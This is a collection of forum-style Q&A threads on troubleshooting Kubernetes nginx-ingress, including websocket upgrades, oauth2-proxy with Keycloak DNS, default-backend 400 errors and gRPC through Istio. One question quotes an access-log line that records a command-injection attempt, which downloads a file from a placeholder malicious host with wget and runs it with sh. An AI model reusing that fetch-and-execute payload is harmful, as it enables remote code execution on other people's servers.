Can't upgrade websocket connection in Kubernetes using Nginx-ingress - nginx

I'm trying to connect to my Mosquitto broker over websockets, but I'm not able to do it because the connection doesn't upgrade. The mosquitto broker expose the port 9001 to allow websocket connections and it is running behind a Kubernetes Cluster with nginx-ingress controllers.
$ kubectl get ingress mosquitto
NAME HOSTS ADDRESS PORTS AGE
mosquitto * 80 14m
.
$kubectl get service
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
mosquitto ClusterIP 10.108.206.11 <none> 9001/TCP,1883/TCP 12m
Mosquitto.yaml:
apiVersion: apps/v1beta1
kind: Deployment
metadata:
name: mosquitto
spec:
replicas: 1
template:
metadata:
labels:
app: mosquitto
spec:
imagePullSecrets:
- name: abb-login
containers:
- name: mosquitto
image: ***/mosquitto:k8s2
imagePullPolicy: Always
ports:
- containerPort: 9001
protocol: TCP
- containerPort: 1883
protocol: TCP
resources: {}
---
apiVersion: v1
kind: Service
metadata:
name: mosquitto
spec:
ports:
- name: "9001"
port: 9001
targetPort: 9001
protocol: TCP
- name: "1883"
port: 1883
targetPort: 1883
protocol: TCP
selector:
app: mosquitto
Mosquitto.conf:
allow_duplicate_messages false
connection_messages true
log_dest stdout stderr
log_timestamp true
log_type all
persistence false
listener 1883
allow_anonymous true
listener 9001
protocol websockets
allow_anonymous false
auth_plugin /usr/lib/mosquitto-auth-plugin/auth-plugin.so
auth_opt_backends http
auth_opt_http_ip 127.0.0.1
auth_opt_http_getuser_uri /api/mosquitto/users
auth_opt_http_superuser_uri /api/mosquitto/admins
auth_opt_http_aclcheck_uri /api/mosquitto/permissions
auth_opt_acl_cacheseconds 1
auth_opt_auth_cacheseconds 0
Ingress.yaml:
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
name: mosquitto
annotations:
nginx.org/websocket-services: mosquitto
spec:
rules:
- http:
paths:
- path: /mosquitto-ws
backend:
serviceName: mosquitto
servicePort: 80
Error from the client:
MqttException (0) - java.io.IOException: WebSocket Response header: Incorrect upgrade.
opc-ua-adapter_1 | at org.eclipse.paho.client.mqttv3.internal.ExceptionHelper.createMqttException(ExceptionHelper.java:38)
opc-ua-adapter_1 | at org.eclipse.paho.client.mqttv3.internal.ClientComms$ConnectBG.run(ClientComms.java:715)
opc-ua-adapter_1 | at java.base/java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:515)
opc-ua-adapter_1 | at java.base/java.util.concurrent.FutureTask.run(FutureTask.java:264)
opc-ua-adapter_1 | at java.base/java.util.concurrent.ScheduledThreadPoolExecutor$ScheduledFutureTask.run(ScheduledThreadPoolExecutor.java:304)
opc-ua-adapter_1 | at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128)
opc-ua-adapter_1 | at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628)
opc-ua-adapter_1 | at java.base/java.lang.Thread.run(Thread.java:834)
Kubernetes ingress-nginx pod logs:
192.168.39.1 - [192.168.39.1] - - [27/Feb/2019:09:59:14 +0000] "GET /mosquitto-ws HTTP/1.1" 308 171 "-" "-" 218 0.000 [default-mosquitto-9001] - - - - 5db23bb19698ac94612ff6ebac265bed
192.168.39.1 - [192.168.39.1] - - [27/Feb/2019:09:59:14 +0000] "\x88\x84\xDDi+\x5C\xECY\x1Bl" 400 157 "-" "-" 0 0.000 [] - - - - 2b8f177f0f62389ba7d918f9c36ee72e
192.168.39.1 - [192.168.39.1] - - [27/Feb/2019:09:59:14 +0000] "GET /mosquitto-ws HTTP/1.1" 308 171 "-" "-" 218 0.000 [default-mosquitto-9001] - - - - c99fe7606530ae938297e227e34084c0
192.168.39.1 - [192.168.39.1] - - [27/Feb/2019:09:59:14 +0000] "\x88\x84dB5aUr\x05Q" 400 157 "-" "-" 0 0.000 [] - - - - 375ec1ac17cc3e0f7595cf8c1cc752c3

Try to increase proxy-read-timeout and proxy-send-timeout on your mosquito ingress definition.
See the NGinx Ingress doc:
https://kubernetes.github.io/ingress-nginx/user-guide/miscellaneous/#websockets

Related

OAuth2 Proxy pod keeps crashing when used with Keycloak in oidc mode on Kubernetes

I'm trying to run a minimalistic sample of oauth2-proxy with Keycloak. I used oauth2-proxy's k8s example, which uses dex, to build up my keycloak example.
The problem is that I don't seem to get the proxy to work:
# kubectl get pods
NAME READY STATUS RESTARTS AGE
httpbin-774999875d-zbczh 1/1 Running 0 2m49s
keycloak-758d7c758-27pgh 1/1 Running 0 2m49s
oauth2-proxy-5875dd67db-8qwqn 0/1 CrashLoopBackOff 2 2m49s
Logs indicate a network error:
# kubectl logs oauth2-proxy-5875dd67db-8qwqn
[2021/09/22 08:14:56] [main.go:54] Get "http://keycloak.localtest.me/auth/realms/master/.well-known/openid-configuration": dial tcp 127.0.0.1:80: connect: connection refused
I believe I have set up the ingress correctly, though.
Steps to reproduce
Set up the cluster:
#Creare kind cluster
wget https://raw.githubusercontent.com/oauth2-proxy/oauth2-proxy/master/contrib/local-environment/kubernetes/kind-cluster.yaml
kind create cluster --name oauth2-proxy --config kind-cluster.yaml
#Setup dns
wget https://raw.githubusercontent.com/oauth2-proxy/oauth2-proxy/master/contrib/local-environment/kubernetes/custom-dns.yaml
kubectl apply -f custom-dns.yaml
kubectl -n kube-system rollout restart deployment/coredns
kubectl -n kube-system rollout status --timeout 5m deployment/coredns
#Setup ingress
kubectl apply -f https://raw.githubusercontent.com/kubernetes/ingress-nginx/master/deploy/static/provider/kind/deploy.yaml
kubectl --namespace ingress-nginx rollout status --timeout 5m deployment/ingress-nginx-controller
#Deploy
#import keycloak master realm
wget https://raw.githubusercontent.com/oauth2-proxy/oauth2-proxy/master/contrib/local-environment/keycloak/master-realm.json
kubectl create configmap keycloak-import-config --from-file=master-realm.json=master-realm.json
Deploy the test application. My deployment.yaml file:
###############oauth2-proxy#############
apiVersion: apps/v1
kind: Deployment
metadata:
creationTimestamp: null
labels:
name: oauth2-proxy
name: oauth2-proxy
spec:
replicas: 1
selector:
matchLabels:
name: oauth2-proxy
template:
metadata:
labels:
name: oauth2-proxy
spec:
containers:
- args:
- --provider=oidc
- --oidc-issuer-url=http://keycloak.localtest.me/auth/realms/master
- --upstream="file://dev/null"
- --client-id=oauth2-proxy
- --client-secret=72341b6d-7065-4518-a0e4-50ee15025608
- --cookie-secret=x-1vrrMhC-886ITuz8ySNw==
- --email-domain=*
- --scope=openid profile email users
- --cookie-domain=.localtest.me
- --whitelist-domain=.localtest.me
- --pass-authorization-header=true
- --pass-access-token=true
- --pass-user-headers=true
- --set-authorization-header=true
- --set-xauthrequest=true
- --cookie-refresh=1m
- --cookie-expire=30m
- --http-address=0.0.0.0:4180
image: quay.io/oauth2-proxy/oauth2-proxy:latest
# image: "quay.io/pusher/oauth2_proxy:v5.1.0"
name: oauth2-proxy
ports:
- containerPort: 4180
name: http
protocol: TCP
livenessProbe:
httpGet:
path: /ping
port: http
scheme: HTTP
initialDelaySeconds: 0
timeoutSeconds: 1
readinessProbe:
httpGet:
path: /ping
port: http
scheme: HTTP
initialDelaySeconds: 0
timeoutSeconds: 1
successThreshold: 1
periodSeconds: 10
resources:
{}
---
apiVersion: v1
kind: Service
metadata:
labels:
app: oauth2-proxy
name: oauth2-proxy
spec:
type: ClusterIP
ports:
- port: 4180
targetPort: 4180
name: http
selector:
name: oauth2-proxy
---
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
labels:
app: oauth2-proxy
name: oauth2-proxy
annotations:
nginx.ingress.kubernetes.io/server-snippet: |
large_client_header_buffers 4 32k;
spec:
rules:
- host: oauth2-proxy.localtest.me
http:
paths:
- path: /
backend:
serviceName: oauth2-proxy
servicePort: 4180
---
# ######################httpbin##################
apiVersion: apps/v1
kind: Deployment
metadata:
name: httpbin
spec:
replicas: 1
selector:
matchLabels:
name: httpbin
template:
metadata:
labels:
name: httpbin
spec:
containers:
- image: kennethreitz/httpbin:latest
name: httpbin
resources: {}
ports:
- name: http
containerPort: 80
protocol: TCP
livenessProbe:
httpGet:
path: /
port: http
readinessProbe:
httpGet:
path: /
port: http
hostname: httpbin
restartPolicy: Always
---
apiVersion: v1
kind: Service
metadata:
name: httpbin-svc
labels:
app: httpbin
spec:
type: ClusterIP
ports:
- port: 80
targetPort: http
protocol: TCP
name: http
selector:
name: httpbin
---
apiVersion: networking.k8s.io/v1beta1
kind: Ingress
metadata:
name: httpbin
labels:
name: httpbin
annotations:
nginx.ingress.kubernetes.io/auth-response-headers: X-Auth-Request-User,X-Auth-Request-Email
nginx.ingress.kubernetes.io/auth-signin: http://oauth2-proxy.localtest.me/oauth2/start
nginx.ingress.kubernetes.io/auth-url: http://oauth2-proxy.localtest.me/oauth2/auth
spec:
rules:
- host: httpbin.localtest.me
http:
paths:
- path: /
backend:
serviceName: httpbin-svc
servicePort: 80
---
# ######################keycloak#############
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: keycloak
name: keycloak
spec:
replicas: 1
selector:
matchLabels:
app: keycloak
template:
metadata:
labels:
app: keycloak
spec:
containers:
- args:
- -Dkeycloak.migration.action=import
- -Dkeycloak.migration.provider=singleFile
- -Dkeycloak.migration.file=/etc/keycloak_import/master-realm.json
- -Dkeycloak.migration.strategy=IGNORE_EXISTING
env:
- name: KEYCLOAK_PASSWORD
value: password
- name: KEYCLOAK_USER
value: admin#example.com
- name: KEYCLOAK_HOSTNAME
value: keycloak.localtest.me
- name: PROXY_ADDRESS_FORWARDING
value: "true"
image: quay.io/keycloak/keycloak:15.0.2
# image: jboss/keycloak:10.0.0
name: keycloak
ports:
- name: http
containerPort: 8080
- name: https
containerPort: 8443
readinessProbe:
httpGet:
path: /auth/realms/master
port: 8080
volumeMounts:
- mountPath: /etc/keycloak_import
name: keycloak-config
hostname: keycloak
volumes:
- configMap:
defaultMode: 420
name: keycloak-import-config
name: keycloak-config
---
apiVersion: v1
kind: Service
metadata:
name: keycloak-svc
labels:
app: keycloak
spec:
type: ClusterIP
sessionAffinity: None
ports:
- name: http
targetPort: http
port: 8080
selector:
app: keycloak
---
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
name: keycloak
spec:
tls:
- hosts:
- "keycloak.localtest.me"
rules:
- host: "keycloak.localtest.me"
http:
paths:
- path: /
backend:
serviceName: keycloak-svc
servicePort: 8080
---
# kubectl apply -f deployment.yaml
Configure /etc/hosts on the development machine file to include localtest.me domain:
127.0.0.1 oauth2-proxy.localtest.me
127.0.0.1 keycloak.localtest.me
127.0.0.1 httpbin.localtest.me
127.0.0.1 localhost
Note that I can reach http://keycloak.localtest.me/auth/realms/master/.well-known/openid-configuration with no problem from my host browser. It appears that the oauth2-proxy's pod cannot reach the service via the ingress. Would really appreciate any sort of help here.
Turned out that I needed to add keycloak to custom-dns.yaml.
apiVersion: v1
data:
Corefile: |
.:53 {
errors
health {
lameduck 5s
}
ready
kubernetes cluster.local in-addr.arpa ip6.arpa {
pods insecure
fallthrough in-addr.arpa ip6.arpa
ttl 30
}
prometheus :9153
forward . /etc/resolv.conf
cache 30
loop
reload
loadbalance
hosts {
10.244.0.1 dex.localtest.me. # <----Configured for dex
10.244.0.1 oauth2-proxy.localtest.me
fallthrough
}
}
kind: ConfigMap
metadata:
name: coredns
namespace: kube-system
Added keycloak showed as below:
apiVersion: v1
data:
Corefile: |
.:53 {
errors
health {
lameduck 5s
}
ready
kubernetes cluster.local in-addr.arpa ip6.arpa {
pods insecure
fallthrough in-addr.arpa ip6.arpa
ttl 30
}
prometheus :9153
forward . /etc/resolv.conf
cache 30
loop
reload
loadbalance
hosts {
10.244.0.1 keycloak.localtest.me
10.244.0.1 oauth2-proxy.localtest.me
fallthrough
}
}
kind: ConfigMap
metadata:
name: coredns
namespace: kube-system

Kubernetes nginx controller, no traffic to default backend: 400s should be 404s

I have an issue where all unknown endpoints are getting 400s returned by the ingress-controller itself. It does not send any traffic to the default backend. Other traffic to defined Ingress points is working fine.
I have seen this in my ingress-controller's logs because every night I get what look to be hand-rolled compromise-attempts, and I assume that the attacker (or script) keep trying because they're getting 400s and not 404s, and these are then presumed to be potentially accessible endpoints when they are not.
I am unsure if it's due to the way I deployed my nginx-ingress-controller or if it's because of how I have set up my ingresses. The ingress-controller is a really just a generic Helm deployment.
Here is part of its deployment manifest:
Name: fashionable-gopher-nginx-ingress-controller
Namespace: kube-system
CreationTimestamp: Tue, 03 Jul 2018 14:02:46 -0700
Labels: app=nginx-ingress
chart=nginx-ingress-0.20.3
component=controller
heritage=Tiller
release=fashionable-gopher
Annotations: deployment.kubernetes.io/revision=1
Selector: app=nginx-ingress,component=controller,release=fashionable-gopher
Replicas: 1 desired | 1 updated | 1 total | 1 available | 0 unavailable
StrategyType: RollingUpdate
MinReadySeconds: 0
RollingUpdateStrategy: 1 max unavailable, 1 max surge
Pod Template:
Labels: app=nginx-ingress
component=controller
release=fashionable-gopher
Service Account: fashionable-gopher-nginx-ingress
Containers:
nginx-ingress-controller:
Image: quay.io/kubernetes-ingress-controller/nginx-ingress-controller:0.14.0
Ports: 80/TCP, 443/TCP
Host Ports: 0/TCP, 0/TCP
Args:
/nginx-ingress-controller
--default-backend-service=kube-system/fashionable-gopher-nginx-ingress-default-backend
Here's an example 400 in the logs, which should be a 404 (no "login.cgi" endpoint exists anywhere):
10.244.3.1 - [10.244.3.1] - - [22/Aug/2018:23:52:35 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://some.malicious.ip.address/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 174 "-" "Hakai/2.0" 203 0.000 [] - - - -
Here's the default backend:
Name: fashionable-gopher-nginx-ingress-default-backend
Namespace: kube-system
CreationTimestamp: Tue, 03 Jul 2018 14:02:46 -0700
Labels: app=nginx-ingress
chart=nginx-ingress-0.20.3
component=default-backend
heritage=Tiller
release=fashionable-gopher
Annotations: deployment.kubernetes.io/revision=1
Selector: app=nginx-ingress,component=default-backend,release=fashionable-gopher
Replicas: 1 desired | 1 updated | 1 total | 1 available | 0 unavailable
StrategyType: RollingUpdate
MinReadySeconds: 0
RollingUpdateStrategy: 1 max unavailable, 1 max surge
Pod Template:
Labels: app=nginx-ingress
component=default-backend
release=fashionable-gopher
Containers:
nginx-ingress-default-backend:
Image: k8s.gcr.io/defaultbackend:1.3
Lastly, here are some pieces from the nginx.conf in the ingress-controller and I'm not an expert in nginx.confs but it looks correct to me:
...
upstream upstream-default-backend {
least_conn;
keepalive 32;
}
server 10.100.3.10:8080 max_fails=0 fail_timeout=0;
location / {
log_by_lua_block {
}
if ($scheme = https) {
more_set_headers "Strict-Transport-Security: max-age=15724800; includeSubDomains";
}
access_log off;
port_in_redirect off;
set $proxy_upstream_name "upstream-default-backend";
set $namespace "";
set $ingress_name "";
set $service_name "";
client_max_body_size "1m";
# In case of errors try the next upstream server before returning an error
proxy_next_upstream error timeout invalid_header http_502 http_503 http_504;
proxy_next_upstream_tries 0;
proxy_pass http://upstream-default-backend;
proxy_redirect off;
}
One note: before I set up my first ingresses (for other domains), then traffic did make it to my default backend and throw 404s.
What should I do now to debug this issue and figure out why these 400s are not getting sent to my default backend?
Edit:
Here's the default-controller's deployment definition:
kubectl get deployment fashionable-gopher-nginx-ingress-default-backend -o yaml -n kube-system
apiVersion: extensions/v1beta1
kind: Deployment
metadata: annotations:
deployment.kubernetes.io/revision: "1"
creationTimestamp: 2018-07-03T21:02:46Z
generation: 1
labels:
app: nginx-ingress
chart: nginx-ingress-0.20.3
component: default-backend
heritage: Tiller
release: fashionable-gopher
name: fashionable-gopher-nginx-ingress-default-backend
namespace: kube-system resourceVersion:
progressDeadlineSeconds: 600 replicas: 1 revisionHistoryLimit: 10 selector:
matchLabels:
app: nginx-ingress
component: default-backend
release: fashionable-gopher strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
type: RollingUpdate template:
metadata:
creationTimestamp: null
labels:
app: nginx-ingress
component: default-backend
release: fashionable-gopher
spec:
containers:
- image: k8s.gcr.io/defaultbackend:1.3
imagePullPolicy: IfNotPresent
livenessProbe:
failureThreshold: 3
httpGet:
path: /healthz
port: 8080
scheme: HTTP
initialDelaySeconds: 30
periodSeconds: 10
successThreshold: 1
timeoutSeconds: 5
name: nginx-ingress-default-backend
ports:
- containerPort: 8080
name: http
protocol: TCP
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
dnsPolicy: ClusterFirst
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
terminationGracePeriodSeconds: 60 status: availableReplicas: 1 conditions:
- lastTransitionTime: 2018-07-03T21:02:46Z
lastUpdateTime: 2018-07-03T21:02:46Z
message: Deployment has minimum availability.
reason: MinimumReplicasAvailable
status: "True"
type: Available
- lastTransitionTime: 2018-07-28T16:19:57Z
lastUpdateTime: 2018-07-28T16:22:06Z
message: ReplicaSet "fashionable-gopher-nginx-ingress-default-backend-5ffffffff"
has successfully progressed.
reason: NewReplicaSetAvailable
status: "True"
type: Progressing observedGeneration: 1 readyReplicas: 1 replicas: 1 updatedReplicas: 1
Edit
Here's the only ingress I have defined for now:
Name: default-myserver-ingress
Namespace: default
Address:
Default backend: default-http-backend:80 (<none>)
TLS:
myapp-tls-host-secrets terminates someapp.somehostname.com
Rules:
Host Path Backends
---- ---- --------
someapp.somehostname.com
/ my-api:8000 (<none>)
Annotations:
kubectl.kubernetes.io/last-applied-configuration: {"apiVersion":"extensions/v1beta1","kind":"Ingress","metadata":{"annotations":{"kubernetes.io/ingress.class":"nginx"},"name":"default-myserver-ingress","namespace":"default"},"spec":{"rules":[{"host":"someapp.somehostname.com","http":{"paths":[{"backend":{"serviceName":"my-api","servicePort":8000},"path":"/"}]}}],"tls":[{"hosts":["someapp.somehostname.com"],"secretName":"myapp-tls-host-secrets"}]}}
kubernetes.io/ingress.class: nginx
Events: <none>
This ingress is defined for a hostname such as someapp.somehostname.com. However, this is a CNAME. The A record associated with this IP address is getting the problematic traffic I mentioned above (even though it's not defined in any of my Ingress definitions) and that traffic is not going to default backend when I think it should be. Does that make sense?
Edit:
Here's the result of kubectl get deployment fashionable-gopher-nginx-ingress-controller -n kube-system -o yaml:
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
annotations:
deployment.kubernetes.io/revision: "1"
creationTimestamp: 2018-07-03T21:02:46Z
generation: 1
labels:
app: nginx-ingress
chart: nginx-ingress-0.20.3
component: controller
heritage: Tiller
release: fashionable-gopher
name: fashionable-gopher-nginx-ingress-controller
namespace: kube-system
resourceVersion: "7461558"
selfLink: /apis/extensions/v1beta1/namespaces/kube-system/deployments/fashionable-gopher-nginx-ingress-controller
spec:
progressDeadlineSeconds: 600
replicas: 1
revisionHistoryLimit: 10
selector:
matchLabels:
app: nginx-ingress
component: controller
release: fashionable-gopher
strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
creationTimestamp: null
labels:
app: nginx-ingress
component: controller
release: fashionable-gopher
spec:
containers:
- args:
- /nginx-ingress-controller
- --default-backend-service=kube-system/fashionable-gopher-nginx-ingress-default-backend
- --election-id=ingress-controller-leader
- --ingress-class=nginx
- --configmap=kube-system/fashionable-gopher-nginx-ingress-controller
env:
- name: POD_NAME
valueFrom:
fieldRef:
apiVersion: v1
fieldPath: metadata.name
- name: POD_NAMESPACE
valueFrom:
fieldRef:
apiVersion: v1
fieldPath: metadata.namespace
image: quay.io/kubernetes-ingress-controller/nginx-ingress-controller:0.14.0
imagePullPolicy: IfNotPresent
livenessProbe:
failureThreshold: 3
httpGet:
path: /healthz
port: 10254
scheme: HTTP
initialDelaySeconds: 10
periodSeconds: 10
successThreshold: 1
timeoutSeconds: 1
name: nginx-ingress-controller
ports:
- containerPort: 80
name: http
protocol: TCP
- containerPort: 443
name: https
protocol: TCP
readinessProbe:
failureThreshold: 3
httpGet:
path: /healthz
port: 10254
scheme: HTTP
initialDelaySeconds: 10
periodSeconds: 10
successThreshold: 1
timeoutSeconds: 1
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
dnsPolicy: ClusterFirst
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
serviceAccount: fashionable-gopher-nginx-ingress
serviceAccountName: fashionable-gopher-nginx-ingress
terminationGracePeriodSeconds: 60
status:
availableReplicas: 1
conditions:
- lastTransitionTime: 2018-07-03T21:02:46Z
lastUpdateTime: 2018-07-03T21:02:46Z
message: Deployment has minimum availability.
reason: MinimumReplicasAvailable
status: "True"
type: Available
- lastTransitionTime: 2018-07-28T16:29:07Z
lastUpdateTime: 2018-07-28T16:31:53Z
message: ReplicaSet "fashionable-gopher-nginx-ingress-controller-69d44d4df4" has
successfully progressed.
reason: NewReplicaSetAvailable
status: "True"
type: Progressing
observedGeneration: 1
readyReplicas: 1
replicas: 1
updatedReplicas: 1

gRPC grpc-status: 8

I am having trouble egetting through with gRPC from external to istio-ingress on Kubernetes.
But I have come so fare, that I can get a respons 200. Now I expect that HTTP/1.1 is curl not supporting http2.
Any help is appreciated, thanks!
HTTP/1.1 200 OK
content-type: application/grpc
grpc-status: 8
grpc-message: malformed method name: "/ghw"
x-envoy-upstream-service-time: 8
date: Thu, 03 May 2018 18:33:28 GMT
server: envoy
content-length: 0
The yaml setup is as following:
apiVersion: apps/v1beta1
kind: Deployment
metadata:
name: grpc-deployment
labels:
app: grpc
spec:
selector:
matchLabels:
app: grpc
replicas: 1
template:
metadata:
labels:
app: grpc
spec:
containers:
- name: grpc
image: local/gcd
imagePullPolicy: Never
ports:
- name: grpc-port
containerPort: 3000
# protocol: HTTP2
---
apiVersion: v1
kind: Service
metadata:
name: grpc-service
spec:
# type: LoadBalancer
selector:
app: grpc
ports:
- port: 3000
name: grpc
# protocol: HTTP2
targetPort: 3000
---
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
name: grpc-ingress
annotations:
kubernetes.io/ingress.class: "istio"
# ingress.kubernetes.io/ssl-passthrough: "true"
spec:
rules:
- http:
paths:
- path: /ghw
backend:
serviceName: grpc-service
servicePort: 3000

Setting up Ingress (Kubernetes)

I want to set up an Ingress, which routes traffic to my underlying Services. Unfortunately, I get an error when I deploy my ingress-controller-deployment.yaml and I don't know why... The pod with the ingress-controller crashes immediately, with the error message "CrashLoopBackOff".
With my understanding the Ingress-Control has to be deployed in a Pod and this pod can be accessed through the ingress-svc. The ingress-svc seems to work, but the Pod crashes. After the ingress-controller works I need an additional file that defines the routes and everything. But I don't see the point of continuing with out a working and deployable ingress-controller.
Pod description:
Name: ingress-controller-7749c785f-x94ll
Namespace: ingress
Node: gke-cluster-1-default-pool-8484e77d-r4wp/10.128.0.2
Start Time: Thu, 26 Apr 2018 14:25:04 +0200
Labels: k8s-app=nginx-ingress-lb
pod-template-hash=330573419
Annotations: kubernetes.io/created-by={"kind":"SerializedReference","apiVersion":"v1","reference":{"kind":"ReplicaSet","namespace":"ingress","name":"ingress-controller-7749c785f","uid":"d8ff0a6d-494c-11e8-a840
-420...
Status: Running
IP: 10.8.0.14
Created By: ReplicaSet/ingress-controller-7749c785f
Controlled By: ReplicaSet/ingress-controller-7749c785f
Containers:
nginx-ingress-controller:
Container ID: docker://5654c7dffc44510132cba303d66ee570280f2cec235e4d4fa6ef8ad543e0c91d
Image: quay.io/kubernetes-ingress-controller/nginx-ingress-controller:0.9.0
Image ID: docker-pullable://quay.io/kubernetes-ingress-controller/nginx-ingress-controller#sha256:39cc6ce23e5bcdf8aa78bc28bbcfe0999e449bf99fe2e8d60984b417facc5cd4
Ports: 80/TCP, 443/TCP
Args:
/nginx-ingress-controller
--admin-backend-svc=$(POD_NAMESPACE)/admin-backend
State: Waiting
Reason: CrashLoopBackOff
Last State: Terminated
Reason: Error
Exit Code: 2
Started: Thu, 26 Apr 2018 14:26:57 +0200
Finished: Thu, 26 Apr 2018 14:26:57 +0200
Ready: False
Restart Count: 4
Liveness: http-get http://:10254/healthz delay=10s timeout=5s period=10s #success=1 #failure=3
Environment:
POD_NAME: ingress-controller-7749c785f-x94ll (v1:metadata.name)
POD_NAMESPACE: ingress (v1:metadata.namespace)
Mounts:
/var/run/secrets/kubernetes.io/serviceaccount from default-token-plbss (ro)
Conditions:
Type Status
Initialized True
Ready False
PodScheduled True
Volumes:
default-token-plbss:
Type: Secret (a volume populated by a Secret)
SecretName: default-token-plbss
Optional: false
QoS Class: BestEffort
Node-Selectors: <none>
Tolerations: node.alpha.kubernetes.io/notReady:NoExecute for 300s
node.alpha.kubernetes.io/unreachable:NoExecute for 300s
Ingress-controller-deployment.yaml
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
name: ingress-controller
spec:
replicas: 1
revisionHistoryLimit: 3
template:
metadata:
labels:
k8s-app: nginx-ingress-lb
spec:
containers:
- args:
- /nginx-ingress-controller
- "--admin-backend-svc=$(POD_NAMESPACE)/admin-backend"
env:
- name: POD_NAME
valueFrom:
fieldRef:
fieldPath: metadata.name
- name: POD_NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
image: "quay.io/kubernetes-ingress-controller/nginx-ingress-controller:0.9.0"
imagePullPolicy: Always
livenessProbe:
httpGet:
path: /healthz
port: 10254
scheme: HTTP
initialDelaySeconds: 10
timeoutSeconds: 5
name: nginx-ingress-controller
ports:
- containerPort: 80
name: http
protocol: TCP
- containerPort: 443
name: https
protocol: TCP
---
apiVersion: v1
kind: Service
metadata:
name: ingress-svc
spec:
type: LoadBalancer
ports:
- name: http
port: 80
targetPort: http
- name: https
port: 443
targetPort: https
selector:
k8s-app: nginx-ingress-lb
The issue is the args. The args on one of mine are
args:
- /nginx-ingress-controller
- --default-backend-service=$(POD_NAMESPACE)/default-http-backend
- --configmap=$(POD_NAMESPACE)/nginx-configuration
- --tcp-services-configmap=$(POD_NAMESPACE)/tcp-services
- --udp-services-configmap=$(POD_NAMESPACE)/udp-services
- --publish-service=$(POD_NAMESPACE)/ingress-nginx
- --annotations-prefix=nginx.ingress.kubernetes.io
I had also created the config maps for configuration, tcp and udp.

k8s ngnix container return json response

I have a k8s cluster, among other things running an nginx.
when I do curl -v <url> I get
HTTP/1.1 200 OK
< Content-Type: text/html
< Date: Fri, 24 Mar 2017 15:25:27 GMT
< Server: nginx
< Strict-Transport-Security: max-age=15724800; includeSubDomains; preload
< Content-Length: 0
< Connection: keep-alive
<
* Curl_http_done: called premature == 0
* Connection #0 to host <url> left intact
however when I do curl -v <url> -H 'Accept: application/json' I get
< HTTP/1.1 200 OK
< Content-Type: text/html
< Date: Fri, 24 Mar 2017 15:26:10 GMT
< Server: nginx
< Strict-Transport-Security: max-age=15724800; includeSubDomains; preload
< Content-Length: 0
< Connection: keep-alive
<
* Curl_http_done: called premature == 0
* Connection #0 to host <url> left intact
* Could not resolve host: application
* Closing connection 1
curl: (6) Could not resolve host: application
My task is to get the request to return a json not html.
To my understanding I have to create an ingress-controller and modify the ngnix.conf somehow, I've been trying for a few days now but can't get it right. Any kind of help would be most appreciated.
The following are of the yaml files I've been using:
configmap:
apiVersion: v1
data:
server-tokens: "false"
proxy-body-size: "4110m"
server-name-hash-bucket-size: "128"
kind: ConfigMap
metadata:
name: nginx-load-balancer-conf
labels:
app: nginx-ingress-lb
daemonset:
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
name: nginx-ingress-lb
labels:
app: nginx-ingress-lb
spec:
template:
metadata:
labels:
name: nginx-ingress-lb
app: nginx-ingress-lb
spec:
terminationGracePeriodSeconds: 60
nodeSelector:
NodeType: worker
containers:
- image: gcr.io/google_containers/nginx-ingress-controller:0.9.0-beta.1
name: nginx-ingress-lb
imagePullPolicy: Always
readinessProbe:
httpGet:
path: /healthz
port: 10254
scheme: HTTP
livenessProbe:
httpGet:
path: /healthz
port: 10254
scheme: HTTP
initialDelaySeconds: 10
timeoutSeconds: 1
# use downward API
env:
- name: POD_NAME
valueFrom:
fieldRef:
fieldPath: metadata.name
- name: POD_NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
ports:
- containerPort: 80
hostPort: 80
- containerPort: 443
hostPort: 443
args:
- /nginx-ingress-controller
- --default-backend-service=$(POD_NAMESPACE)/default-http-backend
- --configmap=$(POD_NAMESPACE)/nginx-load-balancer-conf
deployment:
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
name: default-http-backend
labels:
app: default-http-backend
spec:
replicas: 2
template:
metadata:
labels:
app: default-http-backend
spec:
terminationGracePeriodSeconds: 60
containers:
- name: default-http-backend
# Any image is permissable as long as:
# 1. It serves a 404 page at /
# 2. It serves 200 on a /healthz endpoint
image: gcr.io/google_containers/defaultbackend:1.2
livenessProbe:
httpGet:
path: /healthz
port: 8080
scheme: HTTP
initialDelaySeconds: 30
timeoutSeconds: 5
ports:
- containerPort: 8080
resources:
limits:
cpu: 100m
memory: 20Mi
requests:
cpu: 100m
memory: 20Mi
service:
apiVersion: v1
kind: Service
metadata:
name: default-http-backend
labels:
app: default-http-backend
spec:
selector:
app: default-http-backend
ports:
- port: 80
targetPort: 8080
Remove the space after colon in curl -v <url> -H 'Accept: application/json'
The error message Could not resolve host: application means that it's taking application/json as the URL, instead of a header.
There are two things:
Exposing your app
Making your app return json
The ingess is only relevant to expose your app. And that is not the only option, you can use service (type Load balancer, for example) to achieve that too on most cloud providers. So, I'd keep it simple and not use ingress for now, until you solve the second problem.
As it has been explained, your curl has a syntax problem and that's why it shows curl: (6) Could not resolve host: application.
The other thing is fixing that won't make your app return json. And this is because you are only saying you accept json with that header. But if you want your app to return json, then you need to write it on your app. nginx can't guess how you want to map your HTML to json. There is much no other way than writting it, at least that I know of :-/

Resources